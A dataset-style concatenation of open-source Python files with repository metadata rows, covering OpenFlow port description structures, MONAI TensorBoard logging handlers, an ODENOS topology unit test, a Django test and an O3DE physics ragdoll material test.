"""Create a Port with the optional parameters below.
Args:
port_no (int): Port number.
hw_addr (HWAddress): Hardware address.
name (str): Null-terminated name.
config (~pyof.v0x05.common.port.PortConfig):
Bitmap of OFPPC* flags.
state (~pyof.v0x05.common.port.PortState): Bitmap of OFPPS* flags.
"""
super().__init__()
self.port_no = port_no
self.hw_addr = hw_addr
self.name = name
self.config = config
self.state = state
class PortDescPropHeader(GenericStruct):
""" Common header for all port description properties """
# One of OFPPDPT_*
type = UBInt16()
# Length in bytes of this property
length = UBInt16()
def __init__(self, type=None, length=None):
"""
Create the Header for Port Description properties.
:param type: The Port Description property.
:param length: The length of the message
"""
self.type = type
self.length = length
class PortDescPropEthernet(PortDescPropHeader):
"""Ethernet port description property"""
# Align to 64 bits
pad4 = Pad(4)
""" Bimaps of OFPPF_* that describe features. All bits zeroed if
unsupported or unavailable. """
# Current features.
curr = UBInt32(enum_ref=PortFeatures)
# Feature being advertised by port.
advertised = UBInt32(enum_ref=PortFeatures)
# Features supported by the port.
supported = UBInt32(enum_ref=PortFeatures)
# Features advertised by peer.
peer = UBInt32(enum_ref=PortFeatures)
# Current port bitrate in kbps.
curr_speed = UBInt32()
# Max port bitrate in kbps.
max_speed = UBInt32()
def __init__(self, curr=PortFeatures, advertised=PortFeatures, supported=PortFeatures, peer=PortFeatures, curr_speed=None, max_speed=None):
"""
Create the Port Description Property for Ethernet.
:param curr: Current features.
:param advertised: Feature being advertised by port.
:param supported: Features supported by the port.
:param peer: Features advertised by peer.
:param curr_speed: Current port bitrate in kbps.
:param max_speed: Max port bitrate in kbps.
"""
super().__init__(type=PortDescPropType.OFPPDPT_ETHERNET)
self.curr = curr
self.advertised = advertised
self.supported = supported
self.peer = peer
self.curr_speed = curr_speed
self.max_speed = max_speed
self.length = self.__sizeof__()
class PortDescPropOptical(PortDescPropHeader):
""" Optical port description property. """
# Align to 64 bits.
pad4 = Pad(4)
# Features supported by the port.
supported = UBInt32()
# Minimum TX Frequency/Wavelength.
tx_min_freq_lmda = UBInt32()
# Maximum TX Frequency/Wavelength.
tx_max_freq_lmda = UBInt32()
# TX Grid Spacing Frequency/Wavelength.
tx_grid_freq_lmda = UBInt32()
# Minimum RX Frequency/Wavelength.
rx_min_freq_lmda = UBInt32()
# Maximum RX Frequency/Wavelength.
rx_max_freq_lmda = UBInt32()
# RX Grid Spacing Frequency/Wavelength
rx_grid_freq_lmda = UBInt32()
# Minimum TX power
tx_pwr_min = UBInt16()
# Maximun TX power
tx_pwr_max = UBInt16()
def __init__(self, supported=None, tx_min_freq_lmda=None, tx_max_freq_lmda=None,
tx_grid_freq_lmda=None, rx_min_freq_lmda=None, rx_max_freq_lmda=None,
rx_grid_freq_lmda=None, tx_pwr_min=None, tx_pwr_max=None):
"""
Create the Port Description Property for Optical.
:param supported: Features supported by the port.
:param tx_min_freq_lmda: Minimum TX Frequency/Wavelength.
:param tx_max_freq_lmda: Maximum TX Frequency/Wavelength.
:param tx_grid_freq_lmda: TX Grid Spacing Frequency/Wavelength.
:param rx_min_freq_lmda: Minimum RX Frequency/Wavelength.
:param rx_max_freq_lmda: Maximum RX Frequency/Wavelength.
:param rx_grid_freq_lmda: RX Grid Spacing Frequency/Wavelength
:param tx_pwr_min: Minimum TX power
:param tx_pwr_max: Maximun TX power
"""
super().__init__(type=PortDescPropType.OFPPDPT_OPTICAL)
self.supported = supported
self.tx_min_freq_lmda = tx_min_freq_lmda
self.tx_max_freq_lmda = tx_max_freq_lmda
self.tx_grid_freq_lmda = tx_grid_freq_lmda
self.rx_grid_freq_lmda = rx_grid_freq_lmda
self.rx_min_freq_lmda = rx_min_freq_lmda
self.rx_max_freq_lmda = rx_max_freq_lmda
self.tx_pwr_min = tx_pwr_min
self.tx_pwr_max = tx_pwr_max
self.length = self.__sizeof__()
class PortDescPropExperimenter(PortDescPropHeader):
""" Experimenter port description property. """
# Experimenter ID which takes the same form as in ExperimenterHeader.
experimenter = UBInt16()
# Experimenter defined.
exp_type = UBInt16()
""" Followed by:
- Exactly (length - 12) bytes containing the experimenter data, then
- Exactly (length + 7) / 8 * 8 - (length) (between 0 and 7) bytes
of all-zero bytes.
"""
experimenterData = UBInt32(0)
def __init__(self, experimenter=None, exp_type=None, experimenterData=None):
"""
Create the Port Description Property for Experimenter.
:param experimenter: Experimenter ID which takes the same form as in ExperimenterHeader.
:param exp_type: Experimenter defined.
:param experimenterData: Experimenter Data.
Followed by:
- Exactly (length - 12) bytes containing the experimenter data, then
- Exactly (length + 7) / 8 * 8 - (length) (between 0 and 7) bytes
of all-zero bytes.
"""
super().__init__(type=PortDescPropType.OFPPDPT_EXPERIMENTER)
self.experimenter = experimenter
self.exp_type = exp_type
self.experimenterData = experimenterData
class ListOfPorts(FixedTypeList):
"""List of Ports.
Represented by instances of :class:`Port` and used on
:class:`~pyof.v0x05.controller2switch.features_reply.FeaturesReply`/
:class:`~pyof.v0x05.controller2switch.features_reply.SwitchFeatures`
objects.
"""
def __init__(self, items=None):
"""Create a ListOfPort with the optional parameters below.
Args:
items (:class:`list`, :class:`~pyof.v0x04.common.port.Port`):
One :class:`~pyof.v0x04.common.port.Port` instance or list.
"""
super().__init__(pyof_class=Port,
items=items)
| 35.670588 | 143 | 0.678232 |
acdfb84c8c310a242a9aafeef15d301a4b3b8012 | 14,863 | py | Python | monai/handlers/tensorboard_handlers.py | leotam/MONAI | 866d53df3f754e25fb4635abeb3f27cdaaa718cd | [
"Apache-2.0"
] | null | null | null | monai/handlers/tensorboard_handlers.py | leotam/MONAI | 866d53df3f754e25fb4635abeb3f27cdaaa718cd | [
"Apache-2.0"
] | null | null | null | monai/handlers/tensorboard_handlers.py | leotam/MONAI | 866d53df3f754e25fb4635abeb3f27cdaaa718cd | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from typing import TYPE_CHECKING, Any, Callable, Optional
import numpy as np
import torch
from monai.utils import exact_version, is_scalar, optional_import
from monai.visualize import plot_2d_or_3d_image
Events, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Events")
if TYPE_CHECKING:
from ignite.engine import Engine
from torch.utils.tensorboard import SummaryWriter
else:
Engine, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Engine")
SummaryWriter, _ = optional_import("torch.utils.tensorboard", name="SummaryWriter")
DEFAULT_TAG = "Loss"
class TensorBoardStatsHandler:
"""
TensorBoardStatsHandler defines a set of Ignite Event-handlers for all the TensorBoard logics.
It's can be used for any Ignite Engine(trainer, validator and evaluator).
And it can support both epoch level and iteration level with pre-defined TensorBoard event writer.
The expected data source is Ignite ``engine.state.output`` and ``engine.state.metrics``.
Default behaviors:
- When EPOCH_COMPLETED, write each dictionary item in
``engine.state.metrics`` to TensorBoard.
- When ITERATION_COMPLETED, write each dictionary item in
``self.output_transform(engine.state.output)`` to TensorBoard.
"""
def __init__(
self,
summary_writer: Optional[SummaryWriter] = None,
log_dir: str = "./runs",
epoch_event_writer: Optional[Callable[[Engine, SummaryWriter], Any]] = None,
iteration_event_writer: Optional[Callable[[Engine, SummaryWriter], Any]] = None,
output_transform: Callable = lambda x: x,
global_epoch_transform: Callable = lambda x: x,
tag_name: str = DEFAULT_TAG,
) -> None:
"""
Args:
summary_writer: user can specify TensorBoard SummaryWriter,
default to create a new writer.
log_dir: if using default SummaryWriter, write logs to this directory, default is `./runs`.
epoch_event_writer: customized callable TensorBoard writer for epoch level.
Must accept parameter "engine" and "summary_writer", use default event writer if None.
iteration_event_writer: customized callable TensorBoard writer for iteration level.
Must accept parameter "engine" and "summary_writer", use default event writer if None.
output_transform: a callable that is used to transform the
``ignite.engine.output`` into a scalar to plot, or a dictionary of {key: scalar}.
In the latter case, the output string will be formatted as key: value.
By default this value plotting happens when every iteration completed.
global_epoch_transform: a callable that is used to customize global epoch number.
For example, in evaluation, the evaluator engine might want to use trainer engines epoch number
when plotting epoch vs metric curves.
tag_name: when iteration output is a scalar, tag_name is used to plot, defaults to ``'Loss'``.
"""
self._writer = SummaryWriter(log_dir=log_dir) if summary_writer is None else summary_writer
self.epoch_event_writer = epoch_event_writer
self.iteration_event_writer = iteration_event_writer
self.output_transform = output_transform
self.global_epoch_transform = global_epoch_transform
self.tag_name = tag_name
def attach(self, engine: Engine) -> None:
"""
Register a set of Ignite Event-Handlers to a specified Ignite engine.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if not engine.has_event_handler(self.iteration_completed, Events.ITERATION_COMPLETED):
engine.add_event_handler(Events.ITERATION_COMPLETED, self.iteration_completed)
if not engine.has_event_handler(self.epoch_completed, Events.EPOCH_COMPLETED):
engine.add_event_handler(Events.EPOCH_COMPLETED, self.epoch_completed)
def epoch_completed(self, engine: Engine) -> None:
"""
Handler for train or validation/evaluation epoch completed Event.
Write epoch level events, default values are from Ignite state.metrics dict.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if self.epoch_event_writer is not None:
self.epoch_event_writer(engine, self._writer)
else:
self._default_epoch_writer(engine, self._writer)
def iteration_completed(self, engine: Engine) -> None:
"""
Handler for train or validation/evaluation iteration completed Event.
Write iteration level events, default values are from Ignite state.logs dict.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if self.iteration_event_writer is not None:
self.iteration_event_writer(engine, self._writer)
else:
self._default_iteration_writer(engine, self._writer)
def _default_epoch_writer(self, engine: Engine, writer: SummaryWriter) -> None:
"""
Execute epoch level event write operation based on Ignite engine.state data.
Default is to write the values from Ignite state.metrics dict.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
writer: TensorBoard writer, created in TensorBoardHandler.
"""
current_epoch = self.global_epoch_transform(engine.state.epoch)
summary_dict = engine.state.metrics
for name, value in summary_dict.items():
writer.add_scalar(name, value, current_epoch)
writer.flush()
def _default_iteration_writer(self, engine: Engine, writer: SummaryWriter) -> None:
"""
Execute iteration level event write operation based on Ignite engine.state data.
Default is to write the loss value of current iteration.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
writer: TensorBoard writer, created in TensorBoardHandler.
"""
loss = self.output_transform(engine.state.output)
if loss is None:
return # do nothing if output is empty
if isinstance(loss, dict):
for name in sorted(loss):
value = loss[name]
if not is_scalar(value):
warnings.warn(
"ignoring non-scalar output in TensorBoardStatsHandler,"
" make sure `output_transform(engine.state.output)` returns"
" a scalar or dictionary of key and scalar pairs to avoid this warning."
" {}:{}".format(name, type(value))
)
continue # not plot multi dimensional output
writer.add_scalar(
name, value.item() if isinstance(value, torch.Tensor) else value, engine.state.iteration
)
elif is_scalar(loss): # not printing multi dimensional output
writer.add_scalar(
self.tag_name, loss.item() if isinstance(loss, torch.Tensor) else loss, engine.state.iteration
)
else:
warnings.warn(
"ignoring non-scalar output in TensorBoardStatsHandler,"
" make sure `output_transform(engine.state.output)` returns"
" a scalar or a dictionary of key and scalar pairs to avoid this warning."
" {}".format(type(loss))
)
writer.flush()
class TensorBoardImageHandler:
"""
TensorBoardImageHandler is an Ignite Event handler that can visualize images, labels and outputs as 2D/3D images.
2D output (shape in Batch, channel, H, W) will be shown as simple image using the first element in the batch,
for 3D to ND output (shape in Batch, channel, H, W, D) input, each of ``self.max_channels`` number of images'
last three dimensions will be shown as animated GIF along the last axis (typically Depth).
It can be used for any Ignite Engine (trainer, validator and evaluator).
User can easily add it to engine for any expected Event, for example: ``EPOCH_COMPLETED``,
``ITERATION_COMPLETED``. The expected data source is ignite's ``engine.state.batch`` and ``engine.state.output``.
Default behavior:
- Show y_pred as images (GIF for 3D) on TensorBoard when Event triggered,
- Need to use ``batch_transform`` and ``output_transform`` to specify
how many images to show and show which channel.
- Expects ``batch_transform(engine.state.batch)`` to return data
format: (image[N, channel, ...], label[N, channel, ...]).
- Expects ``output_transform(engine.state.output)`` to return a torch
tensor in format (y_pred[N, channel, ...], loss).
"""
def __init__(
self,
summary_writer: Optional[SummaryWriter] = None,
log_dir: str = "./runs",
interval: int = 1,
epoch_level: bool = True,
batch_transform: Callable = lambda x: x,
output_transform: Callable = lambda x: x,
global_iter_transform: Callable = lambda x: x,
index: int = 0,
max_channels: int = 1,
max_frames: int = 64,
) -> None:
"""
Args:
summary_writer: user can specify TensorBoard SummaryWriter,
default to create a new writer.
log_dir: if using default SummaryWriter, write logs to this directory, default is `./runs`.
interval: plot content from engine.state every N epochs or every N iterations, default is 1.
epoch_level: plot content from engine.state every N epochs or N iterations. `True` is epoch level,
`False` is iteration level.
batch_transform: a callable that is used to transform the
``ignite.engine.batch`` into expected format to extract several label data.
output_transform: a callable that is used to transform the
``ignite.engine.output`` into expected format to extract several output data.
global_iter_transform: a callable that is used to customize global step number for TensorBoard.
For example, in evaluation, the evaluator engine needs to know current epoch from trainer.
index: plot which element in a data batch, default is the first element.
max_channels: number of channels to plot.
max_frames: number of frames for 2D-t plot.
"""
self._writer = SummaryWriter(log_dir=log_dir) if summary_writer is None else summary_writer
self.interval = interval
self.epoch_level = epoch_level
self.batch_transform = batch_transform
self.output_transform = output_transform
self.global_iter_transform = global_iter_transform
self.index = index
self.max_frames = max_frames
self.max_channels = max_channels
def attach(self, engine: Engine) -> None:
"""
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if self.epoch_level:
engine.add_event_handler(Events.EPOCH_COMPLETED(every=self.interval), self)
else:
engine.add_event_handler(Events.ITERATION_COMPLETED(every=self.interval), self)
def __call__(self, engine: Engine) -> None:
"""
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
Raises:
TypeError: When ``output_transform(engine.state.output)[0]`` type is not in
``Optional[Union[numpy.ndarray, torch.Tensor]]``.
TypeError: When ``batch_transform(engine.state.batch)[1]`` type is not in
``Optional[Union[numpy.ndarray, torch.Tensor]]``.
TypeError: When ``output_transform(engine.state.output)`` type is not in
``Optional[Union[numpy.ndarray, torch.Tensor]]``.
"""
step = self.global_iter_transform(engine.state.epoch if self.epoch_level else engine.state.iteration)
show_images = self.batch_transform(engine.state.batch)[0]
if isinstance(show_images, torch.Tensor):
show_images = show_images.detach().cpu().numpy()
if show_images is not None:
if not isinstance(show_images, np.ndarray):
raise TypeError(
"output_transform(engine.state.output)[0] must be None or one of "
f"(numpy.ndarray, torch.Tensor) but is {type(show_images).__name__}."
)
plot_2d_or_3d_image(
show_images, step, self._writer, self.index, self.max_channels, self.max_frames, "input_0"
)
show_labels = self.batch_transform(engine.state.batch)[1]
if isinstance(show_labels, torch.Tensor):
show_labels = show_labels.detach().cpu().numpy()
if show_labels is not None:
if not isinstance(show_labels, np.ndarray):
raise TypeError(
"batch_transform(engine.state.batch)[1] must be None or one of "
f"(numpy.ndarray, torch.Tensor) but is {type(show_labels).__name__}."
)
plot_2d_or_3d_image(
show_labels, step, self._writer, self.index, self.max_channels, self.max_frames, "input_1"
)
show_outputs = self.output_transform(engine.state.output)
if isinstance(show_outputs, torch.Tensor):
show_outputs = show_outputs.detach().cpu().numpy()
if show_outputs is not None:
if not isinstance(show_outputs, np.ndarray):
raise TypeError(
"output_transform(engine.state.output) must be None or one of "
f"(numpy.ndarray, torch.Tensor) but is {type(show_outputs).__name__}."
)
plot_2d_or_3d_image(
show_outputs, step, self._writer, self.index, self.max_channels, self.max_frames, "output"
)
self._writer.flush()
| 48.413681 | 117 | 0.650205 |
acdfb89d08e26530a8faea5408455fb9a2a139c1 | 5,549 | py | Python | src/test/python/org/o3project/odenos/core/component/network/topology/test_topology_changed.py | o3project/odenos | 837d0d3d3c37482e843c40c5eeeac10646e68c65 | [
"Apache-2.0"
] | 26 | 2015-02-18T10:22:50.000Z | 2020-06-18T05:07:54.000Z | src/test/python/org/o3project/odenos/core/component/network/topology/test_topology_changed.py | o3project/odenos | 837d0d3d3c37482e843c40c5eeeac10646e68c65 | [
"Apache-2.0"
] | 45 | 2015-02-20T00:40:45.000Z | 2021-12-14T21:07:57.000Z | src/test/python/org/o3project/odenos/core/component/network/topology/test_topology_changed.py | o3project/odenos | 837d0d3d3c37482e843c40c5eeeac10646e68c65 | [
"Apache-2.0"
] | 30 | 2015-02-19T02:00:35.000Z | 2017-02-18T15:28:09.000Z | # -*- coding:utf-8 -*-
# Copyright 2015 NEC Corporation. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
import unittest
from org.o3project.odenos.core.component.network.topology.node import Node
from org.o3project.odenos.core.component.network.topology.link import Link
from org.o3project.odenos.core.component.network.topology.topology import Topology
from org.o3project.odenos.core.component.network.topology.topology_changed\
import TopologyChanged
class TopologyChangedTest(unittest.TestCase):
def setUp(self):
link1 = Link('Link', '1', 'LinkId1', 'NodeId1',
'PortId1', 'NodeId2', 'PortId3', {})
link2 = Link('Link', '1', 'LinkId2', 'NodeId2',
'PortId4', 'NodeId1', 'PortId2', {})
node1 = Node('Node', '1', 'NodeId1', {}, {})
node2 = Node('Node', '1', 'NodeId2', {}, {})
topology1 = Topology('Topology', 'version',
{'NodeId1': node1}, {'LinkId1': link1})
topology2 = Topology('Topology', 'version',
{'NodeId2': node2}, {'LinkId2': link2})
self.target = TopologyChanged('1', topology1, topology2)
def tearDown(self):
pass
def test_constructor(self):
prev = self.target._TopologyChanged__prev
curr = self.target._TopologyChanged__curr
self.assertEqual(self.target._TopologyChanged__version, '1')
self.assertEqual(
prev.nodes['NodeId1'].node_id, 'NodeId1')
self.assertEqual(
curr.nodes['NodeId2'].node_id, 'NodeId2')
self.assertEqual(
prev.links['LinkId1'].link_id, 'LinkId1')
self.assertEqual(
curr.links['LinkId2'].link_id, 'LinkId2')
def test_version(self):
self.assertEqual(self.target.version, '1')
def test_prev(self):
self.assertEqual(self.target.prev.nodes['NodeId1'].node_id, 'NodeId1')
self.assertEqual(self.target.prev.links['LinkId1'].link_id, 'LinkId1')
def test_curr(self):
self.assertEqual(self.target.curr.nodes['NodeId2'].node_id, 'NodeId2')
self.assertEqual(self.target.curr.links['LinkId2'].link_id, 'LinkId2')
def test_create_from_packed(self):
packed = {'version': '1',
'prev': {'type': 'Topology', 'version': '1',
'nodes': {'NodeId1': {'type': 'Node',
'version': '1',
'node_id': 'NodeId1',
'ports': {},
'attributes': {}}},
'links': {'LinkId1': {'type': 'Link',
'version': '1',
'link_id': 'LinkId1',
'src_node': 'NodeId1',
'src_port': 'PortId1',
'dst_node': 'NodeId2',
'dst_port': 'PortId3',
'attributes': {}}}},
'curr': {'type': 'Topology', 'version': '1',
'nodes': {'NodeId2': {'type': 'Node',
'version': '1',
'node_id': 'NodeId2',
'ports': {},
'attributes': {}}},
'links': {'LinkId2': {'type': 'Link',
'version': '1',
'link_id': 'LinkId2',
'src_node': 'NodeId2',
'src_port': 'PortId4',
'dst_node': 'NodeId1',
'dst_port': 'PortId2',
'attributes': {}}}}
}
result = TopologyChanged.create_from_packed(packed)
self.assertEqual(result.version, '1')
self.assertEqual(result.prev.nodes['NodeId1'].node_id, 'NodeId1')
self.assertEqual(result.curr.nodes['NodeId2'].node_id, 'NodeId2')
self.assertEqual(result.prev.links['LinkId1'].link_id, 'LinkId1')
self.assertEqual(result.curr.links['LinkId2'].link_id, 'LinkId2')
if __name__ == "__main__":
unittest.main()
| 51.37963 | 82 | 0.448549 |
acdfb8beff100dd0aa1e4531f37a3a46972041c0 | 183 | py | Python | Python/3-DevOps/week3/django_testing/app/tutorials/tests.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | 2 | 2022-01-19T02:33:11.000Z | 2022-01-19T02:33:13.000Z | Python/3-DevOps/week3/django_testing/app/tutorials/tests.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | Python/3-DevOps/week3/django_testing/app/tutorials/tests.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.urls import reverse
import pytest
# Create your tests here.
def test_homepage_access():
url = reverse('home')
assert url == "/"
| 18.3 | 32 | 0.721311 |
acdfb98411771b7297029a6959a2f18e33ebd032 | 11,268 | py | Python | AutomatedTesting/Gem/PythonTests/physics/C4925582_Material_AddModifyDeleteOnRagdollBones.py | cypherdotXd/o3de | bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676 | [
"Apache-2.0",
"MIT"
] | 1 | 2022-03-12T14:13:45.000Z | 2022-03-12T14:13:45.000Z | AutomatedTesting/Gem/PythonTests/physics/C4925582_Material_AddModifyDeleteOnRagdollBones.py | cypherdotXd/o3de | bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676 | [
"Apache-2.0",
"MIT"
] | 2 | 2022-01-13T04:29:38.000Z | 2022-03-12T01:05:31.000Z | AutomatedTesting/Gem/PythonTests/physics/C4925582_Material_AddModifyDeleteOnRagdollBones.py | cypherdotXd/o3de | bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676 | [
"Apache-2.0",
"MIT"
] | null | null | null | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
# Test Case ID : C4925582
# Test Case Title : Check that any change (Add/Delete/Modify) made to the material surface in the material library reflects immediately in the ragdoll bones
# fmt: off
class Tests:
enter_game_mode_0 = ("Test 0) Entered game mode", "Test 0) Failed to enter game mode")
find_terrain_0 = ("Test 0) The Terrain was found", "Test 0) The Terrain was not found")
find_default_ragdoll_0 = ("Test 0) Default ragdoll was found", "Test 0) Default ragdoll was not found")
find_modified_ragdoll_0 = ("Test 0) Modified ragdoll was found", "Test 0) Modified ragdoll was not found")
default_ragdoll_bounced_0 = ("Test 0) Default ragdoll bounced", "Test 0) Default ragdoll did not bounce")
modified_ragdoll_bounced_0 = ("Test 0) Modified ragdoll bounced", "Test 0) Modified ragdoll did not bounce")
exit_game_mode_0 = ("Test 0) Exited game mode", "Test 0) Failed to exit game mode")
modified_less_than_default = ("Test 0) Modified ragdoll's bounce height was shorter than default", "Test 0) Modified ragdoll's bounce height was greater than default")
enter_game_mode_1 = ("Test 1) Entered game mode", "Test 1) Failed to enter game mode")
find_terrain_1 = ("Test 1) The Terrain was found", "Test 1) The Terrain was not found")
find_default_ragdoll_1 = ("Test 1) Default ragdoll was found", "Test 1) Default ragdoll was not found")
find_modified_ragdoll_1 = ("Test 1) Modified ragdoll was found", "Test 1) Modified ragdoll was not found")
default_ragdoll_bounced_1 = ("Test 1) Default ragdoll bounced", "Test 1) Default ragdoll did not bounce")
modified_ragdoll_bounced_1 = ("Test 1) Modified ragdoll bounced", "Test 1) Modified ragdoll did not bounce")
exit_game_mode_1 = ("Test 1) Exited game mode", "Test 1) Failed to exit game mode")
modified_greater_than_default = ("Test 1) Modified ragdoll's bounce height was higher than default's", "Test 1) Modified ragdoll's bounce height was not higher than default's")
enter_game_mode_2 = ("Test 2) Entered game mode", "Test 2) Failed to enter game mode")
find_terrain_2 = ("Test 2) The Terrain was found", "Test 2) The Terrain was not found")
find_default_ragdoll_2 = ("Test 2) Default ragdoll was found", "Test 2) Default ragdoll was not found")
find_modified_ragdoll_2 = ("Test 2) Modified ragdoll was found", "Test 2) Modified ragdoll was not found")
default_ragdoll_bounced_2 = ("Test 2) Default ragdoll bounced", "Test 2) Default ragdoll did not bounce")
modified_ragdoll_bounced_2 = ("Test 2) Modified ragdoll bounced", "Test 2) Modified ragdoll did not bounce")
exit_game_mode_2 = ("Test 2) Exited game mode", "Test 2) Failed to exit game mode")
default_equals_modified = ("Test 2) Modified and default ragdoll's bounce height were equal", "Test 2) Modified and default ragdoll's bounce height were not equal")
# fmt: on
def C4925582_Material_AddModifyDeleteOnRagdollBones():
"""
Summary:
Runs an automated test to verify that any change (Add/Delete/Modify) made to the material surface in the material
library reflects immediately in the ragdoll bones
Level Description:
Two ragdolls ("default_ragdoll" and "modified_ragdoll") sit above a terrain. The ragdolls are identical, save for
their physX material.
The ragdoll "default_ragdoll" is assigned the default physx material.
A new material library was created with 1 material, called "Modified", this is assigned to "modified_ragdoll":
dynamic friction: 0.5
static friction: 0.5
restitution: 0.25
Expected behavior:
For every iteration this test measures the bounce height of each entity. The ragdolls save their traveled distances
each iteration, to verify different behavior between each setup.
First the test verifies the two entities are assigned differing materials, without changing anything. With a lower
restitution value, the 'modified' should bounce much lower than 'default'
Next, the test modifies the restitution value for 'modified' (from 0.25 to 0.75). 'modified' should bounce height
than it did in the previous test, and greater than default.
Finally, we delete the 'modified' material entirely. 'modified_ragdoll' should then behave the same as
'default_ragdoll' box, and bounce the same distance.
Test Steps:
1) Open level
2) Collect basis values without modifying anything
2.1) Enter game mode
2.2) Find entities
2.3) Wait for entities to bounce
2.4) Exit game mode
3) Modify the restitution value of 'modified'
3.1 - 3.4) <same as above>
4) Delete 'modified_ragdoll's material
4.1 - 4.4) <same as above>
5) Close editor
Note:
- This test file must be called from the Open 3D Engine Editor command terminal
- Any passed and failed tests are written to the Editor.log file.
Parsing the file or running a log_monitor are required to observe the test results.
:return: None
"""
import os
import sys
import ImportPathHelper as imports
imports.init()
import azlmbr.legacy.general as general
import azlmbr.bus as bus
import azlmbr.components
import azlmbr.physics
import azlmbr.math as lymath
from Physmaterial_Editor import Physmaterial_Editor
from editor_python_test_tools.utils import Report
from editor_python_test_tools.utils import TestHelper as helper
TIMEOUT = 3.0
BOUNCE_TOLERANCE = 0.05
class Ragdoll:
def __init__(self, name):
self.name = name
self.bounces = []
def find_and_reset(self):
self.hit_terrain_position = None
self.hit_terrain = False
self.max_bounce = 0.0
self.reached_max_bounce = False
self.id = general.find_game_entity(self.name)
return self.id.IsValid()
@property
def position(self):
return azlmbr.components.TransformBus(bus.Event, "GetWorldTranslation", self.id)
def get_test(test_name):
return Tests.__dict__[test_name]
def run_test(test_number):
# x.1) Enter game mode
helper.enter_game_mode(get_test("enter_game_mode_{}".format(test_number)))
# x.2) Find entities
terrain_id = general.find_game_entity("terrain")
Report.result(get_test("find_terrain_{}".format(test_number)), terrain_id.IsValid())
Report.result(get_test("find_default_ragdoll_{}".format(test_number)), default_ragdoll.find_and_reset())
Report.result(get_test("find_modified_ragdoll_{}".format(test_number)), modified_ragdoll.find_and_reset())
def on_collision_enter(args):
entering = args[0]
for ragdoll in ragdolls:
if ragdoll.id.Equal(entering):
if not ragdoll.hit_terrain:
ragdoll.hit_terrain_position = ragdoll.position
ragdoll.hit_terrain = True
handler = azlmbr.physics.CollisionNotificationBusHandler()
handler.connect(terrain_id)
handler.add_callback("OnCollisionBegin", on_collision_enter)
def wait_for_bounce():
for ragdoll in ragdolls:
if ragdoll.hit_terrain:
current_bounce_height = ragdoll.position.z - ragdoll.hit_terrain_position.z
if current_bounce_height >= ragdoll.max_bounce:
ragdoll.max_bounce = current_bounce_height
elif ragdoll.max_bounce > 0.0:
ragdoll.reached_max_bounce = True
return default_ragdoll.reached_max_bounce and modified_ragdoll.reached_max_bounce
# x.3) Wait for entities to bounce
helper.wait_for_condition(wait_for_bounce, TIMEOUT)
Report.result(get_test("default_ragdoll_bounced_{}".format(test_number)), default_ragdoll.reached_max_bounce)
Report.result(get_test("modified_ragdoll_bounced_{}".format(test_number)), modified_ragdoll.reached_max_bounce)
for ragdoll in ragdolls:
ragdoll.bounces.append(ragdoll.max_bounce)
# x.4) Exit game mode
helper.exit_game_mode(get_test("exit_game_mode_{}".format(test_number)))
# 1) Open level and enter game mode
helper.init_idle()
helper.open_level("Physics", "C4925582_Material_AddModifyDeleteOnRagdollBones")
# Setup persisting entities
default_ragdoll = Ragdoll("default")
modified_ragdoll = Ragdoll("modified")
ragdolls = [default_ragdoll, modified_ragdoll]
# 2) Collect basis values without modifying anything
run_test(0)
Report.result(Tests.modified_less_than_default, default_ragdoll.bounces[0] > modified_ragdoll.bounces[0])
# 3) Modify the restitution value of 'modified'
material_editor = Physmaterial_Editor("ragdollbones.physmaterial")
material_editor.modify_material("Modified", "Restitution", 0.75)
material_editor.save_changes()
run_test(1)
Report.result(Tests.modified_greater_than_default, default_ragdoll.bounces[0] < modified_ragdoll.bounces[1])
# 4) Delete 'modified's material
material_editor.delete_material("Modified")
material_editor.save_changes()
run_test(2)
Report.result(
Tests.default_equals_modified,
lymath.Math_IsClose(default_ragdoll.bounces[2], modified_ragdoll.bounces[2], BOUNCE_TOLERANCE),
)
Report.info("Default hit terrain: " + str(default_ragdoll.hit_terrain))
Report.info("Modified hit terrain: " + str(modified_ragdoll.hit_terrain))
Report.info("Default max bounce: " + str(default_ragdoll.reached_max_bounce))
Report.info("Modified max bouce: " + str(modified_ragdoll.reached_max_bounce))
Report.info("Default max bounce: " + str(default_ragdoll.bounces[0]))
Report.info("Modified max bouce: " + str(modified_ragdoll.bounces[0]))
if __name__ == "__main__":
import ImportPathHelper as imports
imports.init()
from editor_python_test_tools.utils import Report
Report.start_test(C4925582_Material_AddModifyDeleteOnRagdollBones)
| 51.218182 | 180 | 0.648917 |
